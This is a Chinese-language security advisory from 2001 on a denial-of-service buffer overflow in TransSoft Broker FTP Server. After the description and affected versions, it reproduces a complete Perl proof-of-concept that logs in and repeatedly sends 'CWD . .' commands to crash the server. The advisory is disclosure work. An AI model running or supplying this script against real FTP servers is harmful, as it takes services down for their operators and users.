发布日期：2001-06-10
更新日期：2001-06-15

受影响系统：

TransSoft Broker FTP Server 5.9.5
TransSoft Broker FTP Server 5.7
TransSoft Broker FTP Server 5.1
   - Microsoft Windows ME
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0
   - Microsoft Windows 2000
TransSoft Broker FTP Server 5.0
TransSoft Broker FTP Server 4.7.5.0
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0
   - Microsoft Windows 2000
TransSoft Broker FTP Server 4.0
TransSoft Broker FTP Server 3.0 Build 1
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0

描述：

---

BUGTRAQ  ID: 2851
CVE(CAN) ID: CAN-2001-0688

Broker是TransSoft公司的Windows平台下的Ftp服务器软件，发现它的多个版本存在拒
绝服务攻击漏洞。

登陆成功后，重复输入类似“CD . .”或“CWD . .”的命令会造成缓冲区溢出，然后
导致服务器宕机。

<*来源：courtesy ByteRage (byterage@yahoo.com) *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

courtesy ByteRage (byterage@yahoo.com)提供了如下测试代码：

#!/usr/bin/perl

# Broker FTP Server 5.9.5.0 DoS proof of concept
#
# Syntax : perl brokerdos.pl <host> <port> <loginid> <loginpwd>
# Impact : eventually causes an access violation in the TSFTPSRV process
#          the buffer overflow might be exploitable and be used to gain
access
#          to the FTP Server hostcomputer.
#
# by [ByteRage] <byterage@yahoo.com>
# www.byterage.cjb.net (http://elf.box.sk/byterage/)

use IO::Socket;

$loginid = "anonymous";
$loginpwd = "anonymous";

if (!($host = $ARGV[0])) { $host = "127.0.0.1"; } print "Logging on @
$host:";
if (!($port = $ARGV[1])) { $port = "21"; } print "$port\n\n";
if (!($loginid = $ARGV[2])) { $loginid = "anonymous"; }
if (!($loginpwd = $ARGV[3])) { $loginpwd = "anonymous"; }

$SOCK = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host,
PeerPort=>$port) || die "Couldn't create socket !"; $SOCK->autoflush();

# get daemon banner
$reply = "";
sysread($SOCK, $reply, 2000);
print $reply;
# login
syswrite $SOCK, "USER $loginid\015\012";
sysread($SOCK, $reply, 2000);
print $reply;
syswrite $SOCK, "PASS $loginpwd\015\012";
sysread($SOCK, $reply, 2000);
print $reply;
sysread($SOCK, $reply, 2000);
print "$reply\nSending crash [";

if (substr($reply,0,1) == '2') {
  # Login succesful, send CWD's
  $i = 1; while ($i) {
    $i = syswrite $SOCK, "CWD .
.\015\012";
    print ".";
    sleep(1);
  }
print "]\nSocket write failed... possible cause : Host down :(\n";
}
close($SOCK);
exit();



建议：

---

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本：

http://www.transsoft.com/broker.htm


浏览次数：3877
严重程度：0（网友投票）